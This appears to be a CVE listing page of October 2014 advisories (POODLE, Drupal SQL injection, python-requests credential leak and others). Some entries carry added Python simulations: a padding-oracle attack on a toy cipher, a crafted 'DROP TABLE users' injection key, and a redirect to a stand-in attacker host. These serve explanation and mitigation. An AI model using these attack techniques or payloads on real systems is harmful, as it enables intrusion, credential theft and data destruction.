13 matches found

Added 2014/10/15 12:55 a.m. (842 views)

CVE-2014-3566

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.

CVSS 4.3 | AI score 4.4 | EPSS 0.9413
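The padding-oracle mechanism behind POODLE, as an added simulation that is not part of this advisory or of OpenSSL. SSL 3.0 defines only the last byte of a CBC record (the padding length); the filler bytes are undefined and so cannot be checked. An attacker who can make the victim resend a request with chosen prefix and suffix lengths, and can tamper with the ciphertext in transit, copies the block holding a target byte over the all-padding final block: the server accepts the record exactly when the decrypted last byte equals 15, which reveals one plaintext byte after about 256 attempts. Everything here is constructed: the block cipher is a 4-round HMAC-SHA256 Feistel stand-in for the real cipher, the MAC is a truncated HMAC, the key and the cookie value are made up, and a fresh random IV per record stands in for the new ciphertext the attacker obtains on each replay.

```python
import hashlib
import hmac
import os

BLOCK = 16
KEY = b"constructed-demo-key"   # assumed shared record-layer key (made up)
SECRET = b"sess=4f2a"           # constructed cookie the attacker wants to read

# --- toy 16-byte block cipher (4-round Feistel over HMAC-SHA256); stand-in only ---
def _f(half, i):
    return hmac.new(KEY, bytes([i]) + half, hashlib.sha256).digest()[:8]

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(b):
    L, R = b[:8], b[8:]
    for i in range(4):
        L, R = R, _xor(L, _f(R, i))
    return L + R

def block_decrypt(b):
    L, R = b[:8], b[8:]
    for i in reversed(range(4)):
        L, R = _xor(R, _f(L, i)), L
    return L + R

# --- SSL 3.0 record layer, reduced to what POODLE needs ---
def mac(data):
    return hmac.new(KEY, data, hashlib.sha256).digest()[:BLOCK]

def ssl3_pad(data):
    # pad_len is 0..15; the pad_len filler bytes are not defined by SSL 3.0,
    # so the receiver cannot verify them. That is the flaw being exploited.
    pad_len = BLOCK - 1 - len(data) % BLOCK
    return data + os.urandom(pad_len) + bytes([pad_len])

def encrypt_record(plaintext):
    """Victim side: returns [IV, C1, ..., Cn]. A fresh IV stands in for the
    fresh ciphertext the attacker obtains by making the victim resend."""
    padded = ssl3_pad(plaintext + mac(plaintext))
    blocks = [os.urandom(BLOCK)]
    for i in range(0, len(padded), BLOCK):
        blocks.append(block_encrypt(_xor(padded[i:i + BLOCK], blocks[-1])))
    return blocks

def server_accepts(blocks):
    """Server side under SSL 3.0 rules: only the pad-length byte is checked,
    then the MAC over whatever is left."""
    plain = b"".join(_xor(block_decrypt(blocks[i]), blocks[i - 1])
                     for i in range(1, len(blocks)))
    pad_len = plain[-1]
    if pad_len >= BLOCK:
        return False
    body = plain[:len(plain) - pad_len - 1]
    return hmac.compare_digest(mac(body[:-BLOCK]), body[-BLOCK:])

# --- attacker in the middle ---
def poodle_recover(secret_len, victim, max_tries=20000):
    """victim(prefix, suffix) returns the record for prefix + secret + suffix;
    the attacker chooses the lengths but never sees the secret."""
    recovered = bytearray()
    for j in range(secret_len):
        p = (BLOCK - 1 - j) % BLOCK          # secret[j] becomes the last byte of its block
        s = (-(p + secret_len)) % BLOCK      # data + MAC fill whole blocks: full padding block
        t = (p + j) // BLOCK + 1             # index of that block in [IV, C1, ...]
        for _ in range(max_tries):
            c = victim(b"A" * p, b"B" * s)
            tampered = c[:-1] + [c[t]]       # target block replaces the padding block
            if server_accepts(tampered):
                # accepted means D(C_t)[-1] ^ C_{n-1}[-1] == 15,
                # and P_t[-1] == D(C_t)[-1] ^ C_{t-1}[-1]
                recovered.append((BLOCK - 1) ^ c[-2][-1] ^ c[t - 1][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; block alignment is wrong")
    return bytes(recovered)

def victim(prefix, suffix):
    return encrypt_record(prefix + SECRET + suffix)

if __name__ == "__main__":
    print(poodle_recover(len(SECRET), victim))   # b'sess=4f2a'
```

The whole attack rests on two server-side behaviours visible in `server_accepts`: the filler bytes are never compared, and an accept versus reject is observable. A TLS 1.0-style receiver that checks every padding byte against `pad_len` turns the 1-in-256 accept into a 1-in-2^128 one, which is why the practical mitigation is to disable SSL 3.0 rather than patch the padding check.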
Added 2014/10/16 12:55 a.m. (241 views)

CVE-2014-3704

The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.

CVSS 7.5 | AI score 7 | EPSS 0.9432
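The pattern CVE-2014-3704 describes, as an added Python model that is not Drupal's PHP code: an array bound to a single placeholder is expanded into `:name_0, :name_1, ...` and each element is bound to one of the new names. In the vulnerable form the suffix of each new placeholder is taken from the array's own key, and PHP builds those keys verbatim from request data such as `name[...]=x`, so the key text lands inside the SQL string. The fixed form numbers the elements with a positional counter and never reads the keys. The query and the request data are constructed for the example.

```python
import re

def _rewrite(query, key, names):
    # ':name' -> ':name_0, :name_1'; the \b keeps ':name' from eating ':names'.
    # A callable replacement avoids backslash processing of attacker text.
    joined = ", ".join(names)
    return re.sub(re.escape(key) + r"\b", lambda m: joined, query)

def expand_arguments_vulnerable(query, args):
    """Placeholder names are built from the array's keys (request-controlled)."""
    bound = {}
    for key, value in args.items():
        if isinstance(value, dict):
            new = {f"{key}_{i}": v for i, v in value.items()}
            query = _rewrite(query, key, list(new))
            bound.update(new)
        else:
            bound[key] = value
    return query, bound

def expand_arguments_fixed(query, args):
    """Placeholder names come from a counter; the keys are discarded."""
    bound = {}
    for key, value in args.items():
        if isinstance(value, dict):
            new = {f"{key}_{i}": v for i, v in enumerate(value.values())}
            query = _rewrite(query, key, list(new))
            bound.update(new)
        else:
            bound[key] = value
    return query, bound

def all_placeholders_valid(bound):
    """Defensive check a DB layer can run before preparing: every bound name
    must be a bare identifier placeholder, nothing else."""
    return all(re.fullmatch(r":[A-Za-z_][A-Za-z0-9_]*", n) for n in bound)

QUERY = "SELECT name, mail FROM users WHERE name IN (:name)"
# Constructed request data; PHP would produce this dict from
#   ?name[0); DROP TABLE users; --]=x&name[1]=y
CRAFTED = {":name": {"0); DROP TABLE users; --": "x", "1": "y"}}

if __name__ == "__main__":
    print(expand_arguments_vulnerable(QUERY, CRAFTED)[0])
    print(expand_arguments_fixed(QUERY, CRAFTED)[0])
```

The `all_placeholders_valid` check is the cheap invariant to enforce in any abstraction layer that rewrites SQL text from bound names: a prepared statement only protects the values, so anything that becomes part of the statement text must itself be derived from trusted input.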
Added 2014/10/07 2:55 p.m. (104 views)

CVE-2014-7204

jscript.c in Exuberant Ctags 5.8 allows remote attackers to cause a denial of service (infinite loop and CPU and disk consumption) via a crafted JavaScript file.

CVSS 5 | AI score 6.2 | EPSS 0.03198

Added 2014/10/06 2:55 p.m. (90 views)

CVE-2014-6054

The rfbProcessClientNormalMessage function in libvncserver/rfbserver.c in LibVNCServer 0.9.9 and earlier allows remote attackers to cause a denial of service (divide-by-zero error and server crash) via a zero value in the scaling factor in a (1) PalmVNCSetScaleFactor or (2) SetScale message.

CVSS 4.3 | AI score 7.8 | EPSS 0.43841

Added 2014/10/20 5:55 p.m. (82 views)

CVE-2014-3564

Multiple heap-based buffer overflows in the status_handler function in (1) engine-gpgsm.c and (2) engine-uiserver.c in GPGME before 1.5.1 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via vectors related to "different line lengths in a specific orde...

CVSS 6.8 | AI score 7.6 | EPSS 0.03193

Added 2014/10/10 1:55 a.m. (80 views)

CVE-2014-5270

Libgcrypt before 1.5.4, as used in GnuPG and other products, does not properly perform ciphertext normalization and ciphertext randomization, which makes it easier for physically proximate attackers to conduct key-extraction attacks by leveraging the ability to collect voltage data from exposed met...

CVSS 2.1 | AI score 5.6 | EPSS 0.00108

Added 2014/10/29 10:55 a.m. (78 views)

CVE-2014-3694

The (1) bundled GnuTLS SSL/TLS plugin and the (2) bundled OpenSSL SSL/TLS plugin in libpurple in Pidgin before 2.10.10 do not properly consider the Basic Constraints extension during verification of X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and o...

CVSS 6.4 | AI score 8.5 | EPSS 0.01448

Added 2014/10/16 12:55 a.m. (75 views)

CVE-2014-3686

wpa_supplicant and hostapd 0.7.2 through 2.2, when running with certain configurations and using wpa_cli or hostapd_cli with action scripts, allow remote attackers to execute arbitrary commands via a crafted frame.

CVSS 6.8 | AI score 6 | EPSS 0.04511

Added 2014/10/15 2:55 p.m. (74 views)

CVE-2014-1829

Requests (aka python-requests) before 2.3.0 allows remote servers to obtain a netrc password by reading the Authorization header in a redirected request.

CVSS 5 | AI score 6.4 | EPSS 0.00495
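The safe redirect behaviour for CVE-2014-1829, as an added stand-alone model that is not the python-requests implementation: the client built an Authorization header for the original host (from a netrc lookup), the server answered with a 3xx to another host, and the same header was replayed there. The model strips credentials whenever the redirect target's hostname differs, and only re-attaches credentials if the new host has its own netrc entry. The netrc contents, hostnames and credentials are constructed; `leaky_follow_redirect` reproduces the behaviour the advisory describes for contrast.

```python
import base64
from urllib.parse import urlsplit

# Constructed stand-in for ~/.netrc: hostname -> (login, password). Made up.
NETRC = {"api.example.com": ("alice", "s3cret")}

def basic_auth_header(user, password):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"

def _has_auth(headers):
    return any(k.lower() == "authorization" for k in headers)

def strip_foreign_auth(headers, original_url, redirect_url):
    """Return a copy of headers with Authorization removed if the redirect
    leaves the host the credential was issued for."""
    if urlsplit(original_url).hostname == urlsplit(redirect_url).hostname:
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() != "authorization"}

def follow_redirect(headers, original_url, redirect_url, netrc=NETRC):
    """Headers to send to redirect_url: credentials for the original host are
    never replayed to another host; a netrc entry for the new host, if any,
    supplies that host's own credential."""
    new = strip_foreign_auth(headers, original_url, redirect_url)
    host = urlsplit(redirect_url).hostname
    if not _has_auth(new) and host in netrc:
        new["Authorization"] = basic_auth_header(*netrc[host])
    return new

def leaky_follow_redirect(headers, original_url, redirect_url):
    """The pre-2.3.0 failure mode: every header, Authorization included,
    is replayed to wherever the server points."""
    return dict(headers)

if __name__ == "__main__":
    hdrs = {"Authorization": basic_auth_header(*NETRC["api.example.com"]),
            "Accept": "*/*"}
    src, dst = "https://api.example.com/data", "http://evil.example.net/collect"
    print("leaky:", leaky_follow_redirect(hdrs, src, dst))
    print("fixed:", follow_redirect(hdrs, src, dst))
```

The comparison is on hostname only, which is what this advisory is about; a stricter policy would also treat a scheme or port change (https to http in particular) as a different origin, since a credential that was safe over TLS is not safe in cleartext.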
Added 2014/10/02 2:55 p.m. (61 views)

CVE-2014-7155

The x86_emulate function in arch/x86/x86_emulate/x86_emulate.c in Xen 4.4.x and earlier does not properly check supervisor mode permissions, which allows local HVM users to cause a denial of service (guest crash) or gain guest kernel mode privileges via vectors involving an (1) HLT, (2) LGDT, (3) L...

CVSS 5.8 | AI score 3.7 | EPSS 0.00782

Added 2014/10/20 5:55 p.m. (60 views)

CVE-2014-5025

Cross-site scripting (XSS) vulnerability in data_sources.php in Cacti 0.8.8b allows remote authenticated users with console access to inject arbitrary web script or HTML via the name_cache parameter in a ds_edit action.

CVSS 3.5 | AI score 6.8 | EPSS 0.00453

Added 2014/10/20 5:55 p.m. (59 views)

CVE-2014-5026

Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.8b allow remote authenticated users with console access to inject arbitrary web script or HTML via a (1) Graph Tree Title in a delete or (2) edit action; (3) CDEF Name, (4) Data Input Method Name, or (5) Host Templates Name in a delet...

CVSS 3.5 | AI score 7.2 | EPSS 0.00347

Added 2014/10/02 2:55 p.m. (59 views)

CVE-2014-7154

Race condition in HVMOP_track_dirty_vram in Xen 4.0.0 through 4.4.x does not ensure possession of the guarding lock for dirty video RAM tracking, which allows certain local guest domains to cause a denial of service via unspecified vectors.

CVSS 6.1 | AI score 5.9 | EPSS 0.00905